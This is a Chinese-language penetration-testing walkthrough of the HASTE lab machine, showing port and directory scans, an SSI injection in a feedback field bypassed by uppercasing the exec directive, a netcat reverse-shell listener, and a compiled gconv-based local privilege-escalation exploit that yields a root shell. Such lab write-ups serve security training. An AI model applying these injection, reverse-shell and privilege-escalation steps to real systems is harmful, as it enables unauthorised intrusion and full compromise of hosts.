HASTEVM 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.150           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:28 EDT
Nmap scan report for 192.1.1.150
Host is up (0.0023s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:B3:82:58 (VMware)

TCP 扫描只有 80 端口开放，UDP 扫描结果

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap -sT -sV -sC -O -p80 192.1.1.150             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:39 EDT
Nmap scan report for 192.1.1.150
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: H.A.S.T.E
| http-robots.txt: 1 disallowed entry 
|_/spukcab
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:B3:82:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds

发现了 robots.txt

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap --script=vuln -p80 192.1.1.150             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:39 EDT
Nmap scan report for 192.1.1.150
Host is up (0.00028s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-stored-xss: 
|   Found the following stored XSS vulnerabilities: 
|   
|      Payload: ghz>hzx
|        Uploaded on: http://192.1.1.150:80/receipt.php
|_       Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.150
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.1.1.150:80/
|     Form id: 
|     Form action: receipt.php
|     
|     Path: http://192.1.1.150:80/layout/scripts/jquery.mobilemenu.js
|     Form id: 
|     Form action: #
|     
|     Path: http://192.1.1.150:80/index.php
|     Form id: 
|_    Form action: receipt.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-enum: 
|   /robots.txt: Robots file
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /pages/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
MAC Address: 00:0C:29:B3:82:58 (VMware)

发现了 robots.txt 和 images 以及 pages

目录爆破

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo gobuster dir -u http://192.1.1.150/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,sql,tar,php 
[sudo] password for kali: 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.150/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              sql,tar,php,txt,html
[+] Timeout:                 10s
===============================================================
2023/09/14 03:35:37 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 290]
/index                (Status: 200) [Size: 35]
/images               (Status: 301) [Size: 311] [--> http://192.1.1.150/images/]
/index.php            (Status: 200) [Size: 6851]
/.html                (Status: 403) [Size: 291]
/pages                (Status: 301) [Size: 310] [--> http://192.1.1.150/pages/]
/layout               (Status: 301) [Size: 311] [--> http://192.1.1.150/layout/]
/robots               (Status: 200) [Size: 33]
/robots.txt           (Status: 200) [Size: 33]
/ssi                  (Status: 200) [Size: 579]
/licence.txt          (Status: 200) [Size: 5004]
/licence              (Status: 200) [Size: 5004]
/.html                (Status: 403) [Size: 291]
/.php                 (Status: 403) [Size: 290]
/server-status        (Status: 403) [Size: 299]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 542]
/receipt              (Status: 200) [Size: 2588]
/receipt.php          (Status: 302) [Size: 1] [--> receipt.shtml]
Progress: 7640310 / 7643004 (99.96%)
===============================================================
2023/09/14 04:00:35 Finished
===============================================================

开始查看各个文件路径，index 是很奇怪的一串字符串，先记录下来

images 中没啥东西

pages 中也没啥东西

layout 中也没啥东西

robots.txt

User-agent: *
Disallow: /spukcab

查看/spukcab

文件下载到本地后，除了文件路径，没发现什么有价值的信息

ssi 路径比较奇怪，搜索了一下相关信息，SSI 可能存在注入

SSI — Server Side Include Injection | by Vikas Sharma | Medium

WSTG - v4.1 | OWASP Foundation

SSI 注入

不过 SSI 还是需要有输入点的，根据上面的文章，猜测可能是默认界面中有个 form 框

burp 抓包看看

发现了提交的内容会被返回，有可能是在这里被解析了

一开始尝试了上面文章中的 PoC，但是并没有达到满意的效果

看了 WP 发现，原来这里的 PoC 需要把 exec 改成大写

一种简单的绕过机制，一般这种服务器端命令都会被过滤，所以都需要有绕过思维，而大小写思维有比较常用

而且注入点是在 feedback

反弹 shell

ls 的结果证明了这是在网站根目录，接下来尝试反弹 shell，但是 nc, python, sh 反弹都失败了，那就只能把文件下载到网站根目录中，在浏览器中访问此 php 文件，反弹 shell 成功

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nc -lvnp 443                                    
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.150] 39338
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
 02:03:33 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:b3:82:58 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.150/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1546sec preferred_lft 1546sec
    inet6 fe80::5600:6317:eab4:21f7/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ConverterPlus:/$ sudo -l
sudo -l
[sudo] password for www-data

权限提升

查看用户家目录

www-data@ConverterPlus:/home/starfire$ ls -alih
ls -alih
total 124K
407181 drwxr-xr-x 17 starfire starfire 4.0K Sep 11  2017 .
393217 drwxr-xr-x  3 root     root     4.0K Sep  9  2017 ..
398369 -rw-------  1 starfire starfire  692 Sep 11  2017 .ICEauthority
393246 -rw-------  1 starfire starfire   58 Sep 11  2017 .Xauthority
393335 -rw-------  1 starfire starfire 9.3K Sep 11  2017 .bash_history
408224 -rw-r--r--  1 starfire starfire  220 Sep  9  2017 .bash_logout
408222 -rw-r--r--  1 starfire starfire 3.7K Sep  9  2017 .bashrc
393237 drwx------ 11 starfire starfire 4.0K Sep 11  2017 .cache
393322 drwx------ 14 starfire starfire 4.0K Sep  9  2017 .config
393240 -rw-r--r--  1 starfire starfire   25 Sep  9  2017 .dmrc
398371 drwx------  2 starfire starfire 4.0K Sep  9  2017 .gconf
393359 drwx------  3 starfire starfire 4.0K Sep 11  2017 .gnupg
393331 drwx------  3 starfire starfire 4.0K Sep  9  2017 .local
549568 drwx------  4 starfire starfire 4.0K Sep 11  2017 .mozilla
548637 drwxrwxr-x  2 starfire starfire 4.0K Sep 10  2017 .nano
408223 -rw-r--r--  1 starfire starfire  655 Sep  9  2017 .profile
398482 -rw-r--r--  1 starfire starfire    0 Sep  9  2017 .sudo_as_admin_successful
393432 -rw-------  1 starfire starfire 1.4K Sep 11  2017 .xsession-errors
393247 -rw-------  1 starfire starfire 1.5K Sep 11  2017 .xsession-errors.old
393260 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Desktop
393318 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Documents
393308 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Downloads
393319 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Music
393320 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Pictures
393317 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Public
393316 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Templates
393321 drwxr-xr-x  2 starfire starfire 4.0K Sep  9  2017 Videos
407182 -rw-r--r--  1 starfire starfire 8.8K Sep  9  2017 examples.desktop

其中的各个文件夹都打开看了看，没有收获，看一看 SUID 文件

www-data@ConverterPlus:/home/starfire$ find / -type f -perm -04000 -ls 2>/dev/null
<e/starfire$ find / -type f -perm -04000 -ls 2>/dev/null                     
   131128     32 -rwsr-xr-x   1 root     root        30112 Jul 12  2016 /bin/fusermount
   131203     44 -rwsr-xr-x   1 root     root        43316 May  7  2014 /bin/ping6
   131249     28 -rwsr-xr-x   1 root     root        26492 Jun 14  2017 /bin/umount
   131202     40 -rwsr-xr-x   1 root     root        38932 May  7  2014 /bin/ping
   131229     40 -rwsr-xr-x   1 root     root        38900 May 16  2017 /bin/su
   131165     36 -rwsr-xr-x   1 root     root        34812 Jun 14  2017 /bin/mount
   263148     36 -rwsr-xr-x   1 root     root        34680 May 16  2017 /usr/bin/newgrp
   266140     12 -rwsr-xr-x   1 root     root         9808 Feb  9  2017 /usr/bin/vmware-user-suid-wrapper
   263617    160 -rwsr-xr-x   1 root     root       159852 Jan 20  2021 /usr/bin/sudo
   262396     40 -rwsr-xr-x   1 root     root        39560 May 16  2017 /usr/bin/chsh
   263211     52 -rwsr-xr-x   1 root     root        53128 May 16  2017 /usr/bin/passwd
   273342     20 -rwsr-xr-x   1 root     root        18216 Mar 27  2019 /usr/bin/pkexec
   262394     48 -rwsr-xr-x   1 root     root        48264 May 16  2017 /usr/bin/chfn
   262716     80 -rwsr-xr-x   1 root     root        78012 May 16  2017 /usr/bin/gpasswd
   263160    388 -rwsr-xr--   1 root     dip        396068 Jul 23  2020 /usr/sbin/pppd
   273254    504 -rwsr-xr-x   1 root     root       513528 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   266928      8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   271337     16 -rwsr-xr-x   1 root     root        13840 Mar 17  2017 /usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
   268960     16 -rwsr-xr-x   1 root     root        13960 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   264433     48 -rwsr-xr--   1 root     messagebus    46436 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   262623     12 -rwsr-sr-x   1 root     root           9772 Apr  8  2021 /usr/lib/xorg/Xorg.wrap
   272845    120 -rwsr-xr-x   1 root     root         121420 Feb  7  2021 /usr/lib/snapd/snap-confine

SUID 文件没惊喜，看定时任务

www-data@ConverterPlus:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

看敏感文件的的权限

www-data@ConverterPlus:/tmp$ ls -alih /etc/passwd /etc/shadow /etc/crontab
ls -alih /etc/passwd /etc/shadow /etc/crontab
786579 -rw-r--r-- 1 root root    722 Apr  5  2016 /etc/crontab
812110 -rw-r--r-- 1 root root   2.2K Sep  9  2017 /etc/passwd
809674 -rw-r----- 1 root shadow 1.3K Sep 11  2017 /etc/shadow

到这里一直没收获

内核提权

尝试内核提权

尝试了这两个，都失败了，那就只能用 linpeas 收集一下

根据 CVE 搜索 exp

将三个文件依次下载到靶机

www-data@ConverterPlus:/tmp$ make
make
gcc -shared -o evil.so -fPIC evil-so.c
evil-so.c: In function 'gconv_init':
evil-so.c:10:5: warning: implicit declaration of function 'setgroups' [-Wimplicit-function-declaration]
     setgroups(0);
     ^
evil-so.c:12:5: warning: null argument where non-null required (argument 2) [-Wnonnull]
     execve("/bin/sh", NULL, NULL);
     ^
gcc exploit.c -o exploit
exploit.c: In function 'main':
exploit.c:25:5: warning: implicit declaration of function 'execve' [-Wimplicit-function-declaration]
     execve(BIN, argv, envp);

www-data@ConverterPlus:/tmp$ ./exploit
./exploit
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:b3:82:58 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.150/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1479sec preferred_lft 1479sec
    inet6 fe80::5600:6317:eab4:21f7/64 scope link 
       valid_lft forever preferred_lft forever
# uname -a
uname -a
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
# cd /root
cd /root
# ls
ls
# ls -liah
ls -liah
total 32K
262146 drwx------  5 root root 4.0K Sep 11  2017 .
     2 drwxr-xr-x 23 root root 4.0K Sep 12 06:51 ..
268875 -rw-------  1 root root    5 Sep 11  2017 .bash_history
262239 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
262238 drwx------  2 root root 4.0K Aug  1  2017 .cache
548735 drwx------  3 root root 4.0K Sep 11  2017 .gnupg
548793 drwxr-xr-x  2 root root 4.0K Sep  9  2017 .nano
262240 -rw-r--r--  1 root root  148 Aug 17  2015 .profile

结束战斗

补充提权的问题 靶机H.A.S.T.E: 1渗透记录 | 各种write up (reigniting.github.io)